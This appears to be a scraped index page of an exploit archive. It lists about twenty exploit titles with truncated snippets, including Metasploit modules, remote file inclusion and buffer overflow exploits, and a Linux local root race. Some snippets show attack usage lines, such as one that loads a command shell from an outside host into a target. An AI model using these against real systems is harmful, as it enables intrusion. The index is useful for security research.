HP Data Protector CMD Install Service Vulnerability (msf)

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ Exploit Title: HP Data Protector Client...

Beatport Player 1.0.0.283 - (.M3U File) Local Stack Overflow Exploit (3)

No description provided by source. !/usr/bin/perl Beatport Player 1.0.0.283 .M3U File Stack Core Overflow ExploitSEH Work Only in WIN SP2 FR Credit to SirGod The Discover Stack The exploiter Whalna rire m3a lprogram mati khdeme hta ti chiyeb lpc :d After exec the exploit wait some sec for see the...

ME Download System <= 1.3 (header.php) Remote Inclusion Vulnerability

No description provided by source. +-------------------------------------------------------------------- + + ME Download System 1.3 Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: ME Download System 1.3 + Venedor ...........:...

Yahoo Messenger 5.5 - Remote Exploit (DSR-ducky.c)

No description provided by source. / --- Remote yahoo Messenger V5.5 exploiter on Windows XP --- Dtors Security Research DSR Code by: Rave The buffer looks like this |-----| Fillup x offsetJMP 0x3EIPNOPSSHELLCODE ^^ / include windows.h include stdio.h include stdlib.h include string.h include...

phpBB viewtopic.php Arbitrary Code Execution

No description provided by source. $Id: phpbbhighlight.rb 9671 2010-07-03 06:21:31Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...

Nagios Remote Plugin Executor Arbitrary Command Execution

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' require 'zlib' class...

phpRaid <= 3.0.b3 (phpBB/SMF) Remote File Inclusion Vulnerabilities

No description provided by source. Kurdish Security Advisory phpRaid Remote File Include PHPBB/SMF : Sosyalizim'de .srar insan olmakta .srard.r Abdullah Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com & [email protected] Script : phpRaid Script Website :...

Batch Audio Converter Lite Edition <= 1.0.0.0 - Stack Buffer Overflow (SEH)

No description provided by source. Software Link: http://www.freesoftwaretoolbox.com/files/batchaudiosetup.exe Tested on: Windows XP SP2 Type of Vuln: SEH Code : bacon-exploit.py Greetz: Otoy, Postnix, Jasakom Community, Kilurah, Gesang, dan wedus-wedus lainnya ^^ Thanks: All OffSec member...

HP JetDirect PJL Query Execution

No description provided by source. Exploit Title: HP JetDirect PJL Query Execution Date: Aug 7, 2011 Author: Myo Soe YGN Ethical Hacker Group - http://yehg.net/ Software Link: http://www.hp.com Version: All Tested on: HP LaserJet Pxxxx Series $Id: $ This file is part of the Metasploit Framework a...

FathFTP 1.8 (EnumFiles Method) ActiveX Buffer Overflow (SEH)

No description provided by source. html object classid='clsid:62A989CE-D39A-11D5-86F0-B9C370762176' id='target'/object script language='vbscript' ' Exploit Title: FathFTP 1.8 SEH EnumFiles ActiveX Buffer Overflow ' Author: MadjiX ' Software Link: http://www.fathsoft.com/fathftp.html ' Version 1.7...

WEBinsta CMS <= 0.3.1 (templates_dir) Remote File Include Exploit

No description provided by source. !/usr/bin/perl WEBinsta CMS 0.3.1 templatesdir Remote File Inclusion Exploit Bug Found & code By K-159 echo.or.id c 2006 usage: perl WEBinsta.pl target cmd shell location cmd shell variable perl WEBinsta.pl http://target.com/ http://site.com/cmd.txt cmd cmd shel...

phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Include Exploit

No description provided by source. !/usr/bin/perl phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit Coded by bd0rk || SOH-Crew Usage: exploit.pl target cmd shell shell variable Greetings: str0ke, TheJT, Kacper, Lu7k, Maik Vulnerable Code: includeonce$phpbbrootpath...

PHPOpenChat 2.3.4/3.0.1 PoC.php Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/12817/info PHPOpenChat is prone to multiple remote file-include vulnerabilities. An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the...

DIZzy 1.12 - Local Stack Overflow

No description provided by source. !/usr/bin/ruby Exploit Title: DIZzy 1.12 Local Stack Overflow Google Dork: n/a Date: 17/11/2010 Author: g30rg3x Version: 1.12 Tested on: Windows XP SP3 Eng/Spa CVE: n/a Notes: Bug was originally found on 22/02/2010 but since there is no response from developers ...

SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ This module is based...

D-Link Devices Unauthenticated Remote Command Execution

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...

PHP-Charts 1.0 - PHP Code Execution Vulnerability

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core'...

Linux Kernel 2.6.29 - ptrace_attach() Local Root Race Condition Exploit

No description provided by source. / GNU/Linux kernel 2.6.29 ptraceattach local root race condition exploit. ========================================================================== This is a local root exploit for the 2.6.29 ptraceattach race condition that allows a process to gain elevated...

MS14-019 – Fixing a binary hijacking via .cmd or .bat file

Command .cmd and batch .bat files can be directly provided as input to the CreateProcess as if it is an executable. CreateProcess uses the cmd.exe automatically to run the input .cmd or .bat. Today, with the bulletin MS14-019 we are fixing a vulnerability, where in particular scenario it is...

Symantec Endpoint Protection Manager Remote Command Execution

This Metasploit module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker can reach SQL injection affected components. As xpcmdshell is enabled in the included database instance, it'...